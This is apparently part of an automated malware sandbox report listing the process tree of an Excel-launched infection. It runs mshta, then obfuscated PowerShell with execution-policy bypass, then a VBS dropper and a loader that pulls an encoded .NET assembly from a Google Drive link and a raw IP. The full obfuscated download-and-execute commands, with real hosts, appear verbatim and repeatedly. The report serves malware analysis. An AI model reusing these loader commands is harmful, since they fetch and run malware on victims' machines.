              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE550.tmp" "c:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2BF1.tmp" "c:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE550.tmp" "c:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnK